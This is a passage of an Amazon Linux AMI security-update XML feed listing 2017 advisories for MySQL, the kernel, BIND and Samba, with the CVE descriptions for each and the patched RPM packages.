release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.36" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.36-1.25.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.36" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-common-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.36-1.25.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.36" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.36-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-831</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-831: medium priority package update for mysql55</title><issued date="2017-05-19 00:27:00" /><updated date="2017-05-19 03:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3464:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1443379:
CVE-2017-3464 mysql: Server: DDL unspecified vulnerability (CPU Apr 2017)
CVE-2017-3463:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443378:
CVE-2017-3463 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3462:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443377:
CVE-2017-3462 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3461:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443376:
CVE-2017-3461 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3456:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443369:
CVE-2017-3456 mysql: Server: DML unspecified vulnerability (CPU Apr 2017)
CVE-2017-3453:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1443365:
CVE-2017-3453 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017)
CVE-2017-3450:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1443363:
CVE-2017-3450 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2017)
CVE-2017-3309:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1443359:
CVE-2017-3309 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2017)
CVE-2017-3308:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1443358:
CVE-2017-3308 mysql: Server: DML unspecified vulnerability (CPU Apr 2017)
CVE-2017-3265:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Packaging). Supported versions that are affected are 5.5.53 and earlier, 5.6.34 and earlier and 5.7.16 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS v3.0 Base Score 5.6 (Confidentiality and Availability impacts).
1414423:
CVE-2017-3265 mysql: unsafe chmod/chown use in init script (CPU Jan 2017)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3265" title="" id="CVE-2017-3265" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3308" title="" id="CVE-2017-3308" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3309" title="" id="CVE-2017-3309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3450" title="" id="CVE-2017-3450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3453" title="" id="CVE-2017-3453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3456" title="" id="CVE-2017-3456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3461" title="" id="CVE-2017-3461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3462" title="" id="CVE-2017-3462" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3463" title="" id="CVE-2017-3463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3464" title="" id="CVE-2017-3464" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.56" release="1.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.56" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.56-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.56" release="1.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql55-libs-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.56-1.17.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.56" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.56-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-832</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-832: important priority package update for kernel</title><issued date="2017-05-23 23:25:00" /><updated date="2017-05-31 21:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10229:
The Linux kernel allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSG_PEEK flag. This may create a kernel panic or memory corruption leading to privilege escalation.
1439740:
CVE-2016-10229 kernel: net: Unsafe second checksum calculation in udp.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10229" title="" id="CVE-2016-10229" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.17" release="8.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-4.9.17-8.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.17" release="8.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.17-8.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.17" release="8.31.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.9.17-8.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-833</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-833: important priority package update for bind</title><issued date="2017-05-30 23:49:00" /><updated date="2017-05-31 21:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3139:
* A denial of service flaw was found in the way BIND handled DNSSEC validation. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3139" title="" id="CVE-2017-3139" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1202.html" title="" id="RHSA-2017:1202" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.62.rc1.55.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" 
release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.55.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.62.rc1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-834</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-834: important priority package update for samba</title><issued date="2017-05-30 23:54:00" /><updated date="2017-05-31 21:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7494:
* A remote code execution flaw was found in Samba. A malicious authenticated Samba client, having write access to the Samba share, could use this flaw to execute arbitrary code as root.
CVE-2017-2619:
A race condition was found in the Samba server. A malicious Samba client could use this flaw to access files and directories in areas of the server file system not exported under the share definitions.
1429472:
CVE-2017-2619 samba: symlink race permits opening files outside share directory
CVE-2016-2126:
A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process.
1403115:
CVE-2016-2126 samba: Flaws in Kerberos PAC validation can trigger privilege elevation
CVE-2016-2125:
It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users.
1403114:
CVE-2016-2125 samba: Unconditional privilege delegation to Kerberos servers in trusted realms
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2125" title="" id="CVE-2016-2125" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2126" title="" id="CVE-2016-2126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2619" title="" id="CVE-2017-2619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494" title="" id="CVE-2017-7494" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1270.html" title="" id="RHSA-2017:1270" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-python" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.4.4" release="13.35.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-winbind-modules-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.4.4" release="13.35.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.4.4-13.35.amzn1.noarch.rpm</filename></package><package name="samba" version="4.4.4" release="13.35.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.4.4" release="13.35.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.4.4-13.35.amzn1.noarch.rpm</filename></package><package name="samba-test-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.4.4" 